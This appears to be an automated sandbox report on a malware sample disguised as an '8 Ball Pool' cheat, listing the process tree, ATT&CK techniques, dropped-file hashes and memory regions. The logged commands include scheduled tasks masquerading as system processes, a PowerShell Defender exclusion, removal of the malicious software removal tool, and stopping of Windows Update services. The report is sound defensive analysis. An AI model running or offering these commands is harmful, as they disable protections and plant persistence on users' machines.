C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\VC_redist.x64.exeC:\ProgramData\VC_redist.x64.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\BridgeChainserverwinDriver\csem9dbN8vZV.batFilesize
96B
MD523687194e3bf3dc3d826c00237789bcd
SHA1b702404f2f6a5866b187bc592ede284b3d88ed3f
SHA2567120827c18817b4d40c3be5a799d5dc9f6b69da8c81c1f30d9ba739d52e939e8
SHA512ca75db93b2e810010a53b0513f3744d4a4041b03b78ba8c9b0479be4779186d0aba0454b59565f7d309358156083136d5ddb21c74573d8e01773c74c1f972596
-
C:\BridgeChainserverwinDriver\s6qD0S6dHcOUHMjR5EUKU.vbeFilesize
216B
MD5f97c40bdfc065637f7a2301826e591fb
SHA19882ccc7779be4118dc30bc832926ee480239086
SHA2562cbfdf06e4529d5c54aa9c2c30534918cc3a6b434219e7140f8f715c2ca4f82f
SHA5120d109fa7f0d9c1fe74780bea91159207268a2e702f2f54d8410cd056792aa6d198ebedb4e0d659e7d47e557d2d9d94c06b4309bdabaf64e73e3be2fba80ff8b9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exeFilesize
2.5MB
MD5ff26c2f6a7217b63f1fb50ce5b6c1aa8
SHA1a04ff23aaf1839fbd6554c0d7502ac8c098ca554
SHA256d32be77502806d0e24e6f599ec4277b4c5289cd4e51a244cb4b91b38a6e410e4
SHA512ddcb5ce215f699b8e32aadf135579b6085fcad22298c754cad39e5963f1b3ffeb72b681546ab9507951b3eb3216181e7e118a0d72fc17841df0877bcc8661533
-
C:\Users\Admin\AppData\Local\Temp\Cab8AA5.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\DU95VhgWai.batFilesize
162B
MD5da9ab047135325b1ed1d11cd1e44bcb1
SHA1adffd8462717dd764f19c617fdfb64eb29db864d
SHA256be2263a338223b4ac2d9e560b705a42607b06e42859e58591167c4c8c065568e
SHA512a00fc8aae8e9a14d9a32e873cc9455064fa56843aff5951eb0be54ce7a69f94090fb566b007f8e9ac6c12f2056720eccfc35e8a814c38c7f4113d43554eb1a14
-
C:\Users\Admin\AppData\Local\Temp\Tar8B86.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD55d757efc3d5da7c0f6ab8845e446e5fa
SHA17364efac5c5c9868a54f6808adc036a2c9f74bb5
SHA256550f5d490ae2247e948332fbf1e6e0e861bf31cbc797e4d37ce30141f3d59042
SHA51205ef7c3dc6f6036245242a6a72ed02d5b0346823a27adebced46944eb80c4001c0b8e5c5b53e01920c539b236e1c0112467eb262e549021ffcaca4e28cdc86e8
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\BridgeChainserverwinDriver\8Serverdhcp.exeFilesize
2.0MB
MD5743f6a52665426055c9fda13d40fb782
SHA126beed614bb74f4f04f5aa389c0a51b0064a8723
SHA256d9c39ba21c50bd5cb6eeddd268ad907f682941af43dc1d5897e9b4921608a07b
SHA51267f1c1890f5c5e75a14600eca0335c88144e38411d715b189dc8d9df00e27282d1cf6ba611b514cc27b7e6d92bf200f045e3ab98bb266ff9f4b71d0a643f2196
-
\Users\Admin\AppData\Roaming\8Serverdhcp.exeFilesize
2.3MB
MD50ff1003768cff5135a396f0a01e6b551
SHA1a88c589fc5420c87e1411a364e2386fb4b9b5aa8
SHA256927bed16b09f34d494f87aa49255741ad69523fda030bd48ae73f9cc24ea33c8
SHA512c33e4440a4f974e04dfabb98ebb8d1ad2c9fb8d8d558ce33a1ebfd1350fa9e6b6e398123492fa6e522264746a9c7b513952c2ca744076e8e3569c2e248537bdd
-
\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exeFilesize
901KB
MD5b5ca92538a485317ce5c4dff6c5fd08f
SHA12d61611f3e34cdfc4d7442f39c7a2818bc0f627d
SHA2560aff775071bc938ee44ac07e20e4cabddd5235edb34a437c4d7006a8dab91a5e
SHA512e3318ac45418d83baf0d5c84ce1714e7367bd4e3e8ecb98cc801ef1636a2098d07a718a83bcccbb0bbf725c9d3f1e066501e86171eb45e7167afbe280c6101f6
-
\Users\Admin\AppData\Roaming\conhost8.exeFilesize
2.9MB
MD5229bb3196bb02dc4dadc838c051f1589
SHA1d76da675b39fee99df3b2c2e7f6428d78cae3f99
SHA256f59201c2847549ec8dce9e3250c2acc5ec45a9586c408f57bd29a2cbb60786dd
SHA512be477b12ea86ff4b3394b33a65180fda5dfd4a42f06794186347ad8e6c3006522d24ed71642071cbe0e3ce08f42891653092b5c5cab65d76ceb8094ba0a9dd6b
-
memory/1372-208-0x000000001B620000-0x000000001B902000-memory.dmpFilesize
2.9MB
-
memory/1404-170-0x0000000000420000-0x000000000042E000-memory.dmpFilesize
56KB
-
memory/1404-168-0x0000000000460000-0x0000000000478000-memory.dmpFilesize
96KB
-
memory/1404-166-0x0000000000440000-0x000000000045C000-memory.dmpFilesize
112KB
-
memory/1404-172-0x0000000000430000-0x000000000043E000-memory.dmpFilesize
56KB
-
memory/1404-174-0x0000000000480000-0x000000000048C000-memory.dmpFilesize
48KB
-
memory/1404-176-0x00000000004A0000-0x00000000004AE000-memory.dmpFilesize
56KB
-
memory/1404-178-0x00000000004B0000-0x00000000004BC000-memory.dmpFilesize
48KB
-
memory/1404-164-0x0000000000410000-0x000000000041E000-memory.dmpFilesize
56KB
-
memory/1404-162-0x00000000008B0000-0x0000000000AB4000-memory.dmpFilesize
2.0MB
-
memory/1540-210-0x0000000001E10000-0x0000000001E18000-memory.dmpFilesize
32KB
-
memory/2220-221-0x0000000000C80000-0x0000000000E84000-memory.dmpFilesize
2.0MB
-
memory/2452-35-0x0000000000400000-0x0000000000E0A000-memory.dmpFilesize
10.0MB
-
memory/2452-38-0x0000000000400000-0x0000000000E0A000-memory.dmpFilesize
10.0MB
-
memory/2492-244-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2492-246-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2492-248-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2492-250-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2492-247-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2492-245-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2800-236-0x000000001B5A0000-0x000000001B882000-memory.dmpFilesize
2.9MB
-
memory/2800-237-0x0000000001E30000-0x0000000001E38000-memory.dmpFilesize
32KB